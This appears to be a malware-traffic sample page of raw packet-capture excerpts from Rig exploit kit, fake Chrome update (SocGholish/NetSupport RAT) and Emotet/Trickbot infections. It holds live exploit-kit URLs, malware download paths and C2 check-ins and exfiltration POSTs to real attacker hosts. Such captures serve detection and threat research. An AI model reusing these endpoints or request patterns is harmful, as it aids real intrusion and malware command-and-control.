Rig Exploit Kit EK Loads MedusaHTTP Malware Trojan Backdoor Flash Exploit PCAP File Download Traffic Sample

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 16:57:48.518651 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [.], ack 737, win 64240, length 0
E..(.a….^…%s
..e.P……..U.P…. ..
2019-08-12 16:57:49.127786 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [P.], seq 1:1277, ack 737, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$.b….Y…%s
..e.P……..U.P…cL..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 12 Aug 2019 20:57:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 45973
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2019-08-12 16:59:38.271526 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268: HTTP: POST /forums/members/api.jsp HTTP/1.1
E..4..@…..
..e.w…..P.R.az.e.P….%..POST /forums/members/api.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Host: cdnshop78.world
Content-Length: 192
Expect: 100-continue
Connection: Keep-Alive

2019-08-12 16:59:38.271686 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 269, win 64240, length 0
E..(.b….o{.w..
..e.P..z.e..R.mP….O..
2019-08-12 16:59:38.626952 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 269:461, ack 1, win 64240, length 192: HTTP
E…..@….B
..e.w…..P.R.mz.e.P…….xyz=Jn72I3lUOoD6/K%2BBOVBU21CCWaMR0pT/MMMybhkcYzKf0Fxhd5iX/gM81s2/ry7/68WwIwZcdWQ6itJCp/2EjmcHZrxDMiwaQmK6aOtIdjcivuIb26kGZv0gTBGSgrc2LVstLUlWLVstMl4VcmXCxtXRM%2Bb999Q62gnpsw9gRcO404kDv36jb7g=
2019-08-12 16:59:38.627077 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 461, win 64240, length 0
E..(.c….oz.w..
..e.P..z.e..R.-P…….
2019-08-12 16:59:38.701682 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 1:26, ack 461, win 64240, length 25: HTTP: HTTP/1.1 100 Continue
E..A.d….o`.w..
..e.P..z.e..R.-P…N[..HTTP/1.1 100 Continue

2019-08-12 16:59:38.807386 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [.], ack 26, win 64215, length 0
E..(..@…..
..e.w…..P.R.-z.f.P…….
2019-08-12 16:59:39.444787 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 26:381, ack 461, win 64240, length 355: HTTP: HTTP/1.1 404 Not Found
E….f….n..w..
..e.P..z.f..R.-P…)m..HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 13 Aug 2019 00:59:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.39

2019-08-12 18:02:50.728872 IP 10.8.12.101.49205 > 195.22.26.248.80: Flags [P.], seq 246:434, ack 26, win 64215, length 188: HTTP
E….j@…./
..e…..5.P!p…)iiP…….xyz=Rdbf7Sz9YfcZXmTqimFyqnuXh9Qh2EokgRxWjlW6eKlVYMP/0Ie66coOHRDqh72wYWFpR4xyzrqwauM0ArlQyO1qB/flAxIl7E5s3wAGYyWQvmPGYIc2JkmQEzK0NIxSLVstLUlWLVst5B2FNeT80ZFfKTucqMUWcv06uvZYrUmVLNhFF/hGmbs=
2019-08-12 18:02:50.729083 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [.], ack 434, win 64240, length 0
E..(……K_….
..e.P.5.)ii!p.aP….~..
2019-08-12 18:02:50.900794 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [FP.], seq 26:283, ack 434, win 64240, length 257: HTTP: HTTP/1.1 200 OK
E..)……J]….
..e.P.5.)ii!p.aP….F..HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Aug 2019 22:02:47 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=98d119f0da644d3d3e6a3eec09296b9b|173.166.146.112|1565647367|1565647367|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

Google Chrome FAKE Download Update Malware SocGholish campaign loads NetSupport RAT PCAP File Download Traffic Sample

2019-08-26 15:03:01.209093 IP 10.8.26.101.51807 > 10.8.26.1.53: 44756+ A? mysocalledchaos.com. (37)
E..A.O……
..e
…._.5.-……………mysocalledchaos.com…..

2019-08-26 15:03:01.353045 IP 10.8.26.101.49163 > 166.62.111.64.80: Flags [P.], seq 1:409, ack 1, win 256, length 408: HTTP: GET / HTTP/1.1
E….d@…..
..e.>o@…P.9…C.&P…….GET / HTTP/1.1
Host: mysocalledchaos.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en

2019-08-26 15:03:39.075406 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 17917:19120, ack 14190, win 451, length 1203: HTTP
E…….1.[S….
..e.P.>..Y,n.?xP…0…

2019-08-26 15:03:39.075745 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 19120, win 256, length 0
E..(..@…[.
..e…..>.Pn.?x..].P………….
2019-08-26 15:03:39.168023 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 19120:20580, ack 14190, win 451, length 1460: HTTP
E…….1.ZQ….
..e.P.>..].n.?xP…….1000
2019-08-26 15:03:39.168037 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 20580:22040, ack 14190, win 451, length 1460: HTTP
E…….1.ZP….
..e.P.>..c.n.?xP…;…
2019-08-26 15:03:39.168042 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 22040:23224, ack 14190, win 451, length 1184: HTTP
E…….1.[c….
..e.P.>..iGn.?xP…X…

2019-08-26 15:03:39.168046 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 23224:24684, ack 14190, win 451, length 1460: HTTP
E…….1.ZN….
..e.P.>..m.n.?xP…’F..1000
a60755f48a29afb476002a0b1908e53c2a784b96c2dc9aa60455cecb55578c1361087c78243448031d2dd5afbcebd548349eae4ecb7e01335901194a5d2e6a784996c3d9cbc36a33f1cb0d73d45373580918495f2e687873962bbcd8a60a139aae21af8777172b6c6a3b5e2e6a690996cbdd9aae8e4ab3cb4dcbc24016356f1b484fca7b384997c3d9d6c76b30f1cb4fcbfc132f3b4919441b470f142dd7a7b9eac37526f0cb4dda86137b590b11c0426e6a78499290b8f4c00455f1735f8bc612735d477825382c6a7a49d0c309c5e60659b4ae3982a867162b6f782b382d6a7859d6c3d598a50eddec8b4dcbc617203c657f4a5d3c2a6b0996c2dd9bef4f11f1cb6dcbc613735b091a073f4468784b96fddd18f84655e28c28bf8f7d073c7b7f293e4b2f163de4bade982a1215f3c34dc9c6137359091948597d0f142f94c3cfd8b54655f2cb4e828f5771590b19795d36f632498784b8ecef682196b92baaa57627386b752d5e2e726d0996cbdd99a60655f3cb4dcbc24016356f1b485f2e59788dc883dd90f3683c87852ca6a31073e11b5948552e68784996c3dd98a6020696a72bc9c653cb4b4919495d2f6b7a4994c3e998be9a1ff3c218a5af67203a66692d5e2ed26a0996cbdd9aa60655f3cb4dcbc24016356f1b481d9678384997c3dc99a40657f3f84d039b53735f4c683d3c42197b4996d39d98ae0657fb43528bc613735d5a7c243b2c6a70c18983dd99a6051a91a14fcbc4135859d944085d252d1d3ddea2aef0e5693196c84d57d6537351091840d5312a784996c78efdca6057f3c94df8c63f131909111c327d1e0a20f8a4de981e1415f3c34dc9ce9b6c19091948597d0f142f94c39d20b44655f2cb4ccac413715952196c3d6e6a691af7a5b8dbc76a39b6b32eaeb6671a36671a48753d2a784196c0d510b94655f3cb4998a37f155b0911c0426e6a79499a86a5fbc37621bca927aea56771590919591d…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:18.005975 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8959766, win 3626, length 0
E..(..@…M.
..e…..>.Pn.Bf.A.EP..* y……..
2019-08-26 15:04:18.016420 IP 93.95.100.178.80 > 10.8.26.101.49204: Flags [F.], seq 13215, ack 336, win 473, length 0
E..(V|..5.H.]_d.
..e.P.4vO….:.P….n..
2019-08-26 15:04:18.016640 IP 10.8.26.101.49204 > 93.95.100.178.80: Flags [.], ack 13216, win 256, length 0
E..(..@….W
..e]_d..4.P..:.vO..P….G……..
2019-08-26 15:04:18.037966 IP 93.95.100.178.80 > 10.8.26.101.49205: Flags [F.], seq 6011, ack 365, win 473, length 0
E..(…5.B.]_d.
..e.P.58._.DT.P....z..
2019-08-26 15:04:18.038169 IP 10.8.26.101.49205 > 93.95.100.178.80: Flags [.], ack 6012, win 256, length 0
E..(..@....V
..e]_d..5.P.DT.8.`P….S……..
2019-08-26 15:04:18.051835 IP 93.95.100.178.80 > 10.8.26.101.49206: Flags [F.], seq 343, ack 408, win 473, length 0
E..(….5..S]_d.
..e.P.6..0…..P…V…
2019-08-26 15:04:18.052044 IP 10.8.26.101.49206 > 93.95.100.178.80: Flags [.], ack 344, win 255, length 0
E..(..@….U
..e]_d..6.P……0.P…Wb……..
2019-08-26 15:04:18.568546 IP 93.95.100.178.80 > 10.8.26.101.49207: Flags [F.], seq 16499, ack 424, win 473, length 0
E..(.B..5…]_d.
..e.P.7q5jo.n..P….L..
2019-08-26 15:04:18.568555 IP 93.95.100.178.80 > 10.8.26.101.49209: Flags [F.], seq 16623, ack 424, win 473, length 0
E..(z…5.$.]_d.
..e.P.9…FV[..P…….
2019-08-26 15:04:18.568559 IP 93.95.100.178.80 > 10.8.26.101.49208: Flags [F.], seq 15919, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.8(…I…P…u”..
2019-08-26 15:04:18.568563 IP 93.95.100.178.80 > 10.8.26.101.49210: Flags [F.], seq 16511, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.:S.c…4.P…]…
2019-08-26 15:04:18.568814 IP 10.8.26.101.49207 > 93.95.100.178.80: Flags [.], ack 16500, win 256, length 0
E..(..@….T
..e]_d..7.P.n..q5jpP….%……..
2019-08-26 15:04:18.568842 IP 10.8.26.101.49209 > 93.95.100.178.80: Flags [.], ack 16624, win 256, length 0
E..(..@….S
..e]_d..9.PV[…..GP… ………
2019-08-26 15:04:18.568850 IP 10.8.26.101.49208 > 93.95.100.178.80: Flags [.], ack 15920, win 256, length 0
E..(..@….R
..e]_d..8.PI…(…P…u………
2019-08-26 15:04:18.568856 IP 10.8.26.101.49210 > 93.95.100.178.80: Flags [.], ack 16512, win 256, length 0
E..(..@….Q
..e]_d..:.P..4.S.c.P…]………
2019-08-26 15:04:19.288443 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [P.], seq 3947:3986, ack 89439, win 821, length 39
E..Oa-..T.d…]#
..e…0.m… D.P..5z…….”…
;.s+2..,…..+,……j….0..Y
2019-08-26 15:04:19.288452 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a…T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.288696 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [.], ack 3987, win 253, length 0
E..(..@…=2
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.288940 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [F.], seq 89439, ack 3987, win 253, length 0
E..(..@…=1
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.289444 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a/..T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.302333 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [.], ack 89440, win 821, length 0
E..(.k..T…..]#
…skipping…
2019-08-26 15:04:19.967401 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [P.], seq 1:119, ack 1, win 258, length 118: HTTP: GET /location/loca.asp HTTP/1.1
E…..@….
..e>..#.@.P.@..~b#.P…….GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:04:20.126241 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [P.], seq 215:521, ack 655, win 254, length 306
E(.ZrF..n.o=.+.Z
..e…?…….!P…l…HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=u.2h.r.. .…W.h.E..=I….=n~…….7s.4…}.X…),.,.Dq.,…..()4.]..%y-A9H=n .:!…b<D…c…)=@UX.u….8+.t_A…R..b..’h[.T…jI

2019-08-26 15:04:20.134779 IP 62.172.138.35.80 > 10.8.26.101.49216: Flags [P.], seq 1:276, ack 119, win 258, length 275: HTTP: HTTP/1.1 200 OK
E..;9…q.”S>..#
..e.P.@~b#..@..P….?..HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Set-Cookie: ASPSESSIONIDSQTTAQAS=JMCCAGKBFCGMCLKBAJJGPDLL; path=/
X-Powered-By: ASP.NET
Date: Mon, 26 Aug 2019 19:04:18 GMT
Content-Length: 1

,
2019-08-26 15:04:20.135084 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [.], ack 276, win 257, length 0
E..(..@….~
..e>..#.@.P.@..~b$.P…[d……..
2019-08-26 15:04:20.327276 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 655:927, ack 521, win 258, length 272
E..8..@…r.
..e.+.Z.?…..!…(P…….POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 179.43.146.90
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=l3.<(T{.E…..V….k.9|||$(m..$Cj_……..0Mt..s…M.6..

2019-08-26 15:04:20.570080 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [.], ack 927, win 253, length 0
E(.(rG..n.pn.+.Z
..e…?…(…1P…Td..
2019-08-26 15:04:20.627030 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:…y………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.675976 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:.
.{………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.727322 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 927:1217, ack 521, win 258, length 290
E..J..@…r.
..e.+.Z.?…..1…(P….b..POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Host: 179.43.146.90
…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:26.662060 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8960053, win 3624, length 0
E..(.B@…Ln
..e…..>.Pn.G..A.dP..(……….
2019-08-26 15:04:30.427725 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [P.], seq 409336:409766, ack 8960053, win 3624, length 430: HTTP: POST /1×1.gif?ss&ss2img HTTP/1.1
E….C@…J.
..e…..>.Pn.G..A.dP..(….POST /1×1.gif?ss&ss2img HTTP/1.1
Accept: */*
Accept-Language: en-us
Age: a17316821ea1038c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 979879f9.user3.altcoinfan.com
Content-Length: 385714
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:03:01.423467 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 468
E….s@…..
..e.. ..7…..K@:..k..$b……#…[.!….l.X...#.Fdg3..GZ.3q'\].#K..d.u..h.,.4.V..GP.....2z2..T.b[>.8.=^."$.n>m....V.c......f..H..Z...0b....9.>.........(......rV=L~.....m-...0M|.D+.....M.@...-..OA.#..3V7....<.K...,s_..iwk...kyK..S..r=....6......Y..L......|.L.I.........q6...."{v.....)%.g,.@.....]*$.....V.../.ZUD..U.+...6.&+![..aM....d.b.4D.......(."K...?....G..z.).k.c"...!cX.$6I.... ..%…>Z$.r…..S.d.ck.[…..:D..5….jY=.rj.. p ..1…Q..H_……!…zt..……Q.. O..a.….
2019-08-26 15:03:01.423995 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 1010
E….t@…#.
..e…........@.<4........ZL...;..!..@.S..!...s....2(.Bk2.m..f}.....8A..8……~.WG..S….……….}.#.v7..z5′.]..xn.x……._?..1.)..t.k8S..Y..O0Q. W.k….h.P.c…o…?4. ….Ih….A..J.jc…..x..l.D[.]a...8.M..7/&d.V./.Y...9._l....R]F..6....H..\k&..+......:.3ul.n.B.#=.....[Mw."P...Z.E..p2X.1[Be.n..=-4(V..%..VsdL...1..?..2^3.....R.........A....h.@m....&1])_x.....Lx.[e...s[.....;.2B+.qL..V..W...@TM..P..h-..R.|........1..%...d.qOm..i.}..?'..w.n"{.j.}P........;)X4...t.B..3........:..dUhQ.....;.....^.#w.e.,.@b8.DZh.1.D....@...W$~....?.....,.H.l.......n..$.+..H.$..NC5?..N...i.V..rx......8..g.$.;.=g2.....(..+.\.G.dXb.dQ.QU.....o......0.i(<.n#3...ube..q*l.wx...N!:51...{..z[......{2 8R4G.c'5.....Y;.:.0.e.-.]..Je....95..L.F#).)..@g.3&a.sg-.........S0..<|n..=....."$"D..>bE.?S.>..Y....)q. .e.F.Y2^...4......Y^..71t......4.p..v....s .h...xK>./.......d...j.>.zv[..n...M4J,..zJA.L....E.....B*.
2019-08-26 15:03:01.472993 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8.x@....M
..e.. ..7...$..@:..k..$b.S.c...$....lhZW_..
2019-08-26 15:03:01.473493 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
E..8.y@...'i
..e.....…$. @.<4……#8o.$.1Y..D….W76
2019-08-26 15:03:01.504670 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
E..8.{@…’g
..e….....$t.@.<4..........I..". wI.....:
2019-08-26 15:03:01.528689 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 254
E....|@....g
..e.. ..7......@:..k..$b....Jb.....r.u.7..........?2..;h.E...N}...h>W.r....r_]...'....|..YTb..7i..:i..3..Y.U......'!.jd.6.~..5...i.],+O....n9.I.G......B..<..ND./...<...1.+....R..Y...F.B.l .Xge....@x.L.a.,K.1a...,.m....L. ^7.Y...6UR.E....R..e...>X5w.....D..=f....Ku...y*
2019-08-26 15:03:01.573710 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8.}@....H
..e.. ..7...$.r@:..k..$b ...I..L@...;.fV..z
2019-08-26 15:03:01.576544 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 337
E..m.~@.....
..e.. ..7...YGh@:..k..$b foU?.....]...C.T.+...K.....s"......,....=(K.[.w...+.E....~|.T....'.cgK,.!....V.:._q.g.~..R.i.....H..a...u."#xJ/_.@.M.b...[.."s..Q.*])...C.<........P.!2...nA..5h....M&.j..!.H..Z.K..F.w..b.....)...Y.......e6t=.\......……..”…….f….>……:…=X._.. k..P…,5…e.A%t?o.?….C.=P7P.p.&.@.M ……..6’…….(.R5..s.e0..h.
2019-08-26 15:03:01.625002 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8..@….E
..e.. ..7…$R.@:..k..$b.8 ..@…0..@.um…
2019-08-26 15:03:01.802524 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 247
E…..@….f
..e.. ..7….1X@:..k..$b.,|..|..;….id{.,.4.3……..=L_g…Q..Q.V.z{…1}..2.L.4…….!…0^+.P…+……G[g..m..5<.(7..[….v.w…j.<&z..rl.s[x…T..aJ&3jm:^….=.n..a.?.U.m&..I..SI.V…}.h.[…h..0…|.p…K#}V~c..k,..o.s.…N…@.w….W…..4~U.! ..CF..
2019-08-26 15:03:01.849036 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8..@….@
..e.. ..7…$..@:..k..$b..|…+:.ZQ…..o.
2019-08-26 15:03:03.418784 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$_D@M…..K?…6L…..K……0b
2019-08-26 15:03:03.421675 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$.@@M…..K?.?q8#.8a.Uu?…{H O
2019-08-26 15:03:03.421733 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$?A@M…..K?..?w....}...N=..5.
2019-08-26 15:03:03.421795 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@.....
..e.. ......$.^@M.....K?.|.2.\9..g.9..]...7
2019-08-26 15:03:03.422363 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@.....
..e.. ......$..@M.....K?...J...T.J.pU.]....
2019-08-26 15:03:03.422395 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@.....
..e.. ......$ab@M.....K?.j.U..aAm..*.5%._Z.
2019-08-26 15:03:03.424121 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@.....
..e.. ......$p.@M.....K?..X+O.Ts.L..9:..M..
2019-08-26 15:03:03.424206 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8. @.....
..e.. ......$..@M.....K?.}..j...!.@.z.Du..9
2019-08-26 15:03:03.424444 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.!@.....
..e.. ......$..@M.....K?.......B#...._MC}.h
2019-08-26 15:03:03.435279 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.H@.....
..e.. ......$4O@M.....K?....P0.&..%.M..9*Y.
2019-08-26 15:03:03.435326 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.I@.....
..e.. ......$..@M.....K?...,.OJ.......9uP4.
2019-08-26 15:03:03.435397 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.J@.....
..e.. ......$I.@M.....K?..*.v.#^.R...[~.RR.
2019-08-26 15:03:03.435469 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.K@.....
..e.. ......$a.@M.....K?....J.G.... ..c...k
2019-08-26 15:03:03.435540 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.L@.....
..e.. ......$;@@M.....K?..."h.A...1....&...
2019-08-26 15:03:03.448683 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 41
E..E.T@.....
..e.. ......1..@M.....K?.).R.8:.'.k....k.-..6....g=.G_..
2019-08-26 15:03:03.448737 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8.W@.....
..e.. ......$|.@M.....K?....F. .h."........
2019-08-26 15:03:03.541893 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 296
E..D..@.....
..e.. 
..7...0Q.@:..k..$b..>^n;".. s..Hf:T>.....W....."... ..a.#8.a..X'B..-....a.=.6..m".7.2..^ /..aA.!N... 4F..M...SJ<.F….+h…IRy5..J.B….!!ME….]Z.
..x..C.a..”Q.1..V….Bb:.;)w.(.n..[…r*}~..gM.^.…..7T.fm…s..”….$….6..L..i.d….~.u7D~.>.m0d.M..$.iX..y…….},.Z).a.w;j.. &.M.tb..9k.?.Kn+..IE1\’
2019-08-26 15:03:03.575606 IP 10.8.26.101.64439 > 172.217.9.142.443: UDP, length 1350
E..b..@…..
..e.. ……N…Q046P….2..x…. ……………CHLO….PAD…..SNI…..VER…..CCS…..UAID(…TCID,…PDMD0…SMHL4…ICSL8…NONPX…MIDS…SCLS...CSCT…COPTd…IRTTh…CFCWl…SFCWp…———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————www.google-analytics.comQ046…....~.......Chrome/76.0.3809.132 Windows NT 6.1; Win64; x64....X509........l..Y]..@T.]...W.....E.+...Zk^.o"d.......NSTP.w........…………………………………………………………………………………………………………………………………………………………………………………………………….

Emotet Banking Trojan and Trickbot Malware Traffic Sample infection w/Spambot Noise PCAP file Download

2019-09-18 13:32:22.678529 IP 10.9.18.101.49160 > 124.158.6.218.80: Flags [P.], seq 4191540612:4191540891, ack 2860101733, win 64240, length 279: HTTP: GET /wp-admin/n2keep7/ HTTP/1.1
E..?..@…Y1
.e|……P…..y.eP…Y…GET /wp-admin/n2keep7/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: thinhvuongmedia.com
DNT: 1
Connection: Keep-Alive

2019-09-18 13:32:22.942838 IP 124.158.6.218.80 > 10.9.18.101.49160: Flags [P.], seq 1:1277, ack 279, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$T…..A.|…
.e.P…y.e….P…….HTTP/1.1 200 OK
Date: Wed, 18 Sep 2019 17:26:02 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.33
X-Powered-By: PHP/5.6.33
Set-Cookie: 5d8268aa1193f=1568827562; expires=Wed, 18-Sep-2019 17:27:02 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 18 Sep 2019 17:26:02 GMT
Expires: Wed, 18 Sep 2019 17:26:02 GMT
Content-Disposition: attachment; filename="i5pv72yr.exe"
Content-Transfer-Encoding: binary
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

2019-09-18 13:33:30.627377 IP 10.9.18.101.49165 > 66.228.32.31.443: Flags [P.], seq 3657721627:3657721896, ack 2496123025, win 64240, length 269
E..5..@…vV
.eB. …….g…..P…”…GET /whoami.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 66.228.32.31:443
Cache-Control: no-cache

2019-09-18 13:33:30.669920 IP 10.9.18.101.49164 > 189.129.4.186.80: Flags [P.], seq 899:1832, ack 2600252, win 63022, length 933: HTTP: POST /rtm/symbols/ HTTP/1.1
E…..@…..
.e…….Pr..G..^.P…….POST /rtm/symbols/ HTTP/1.1
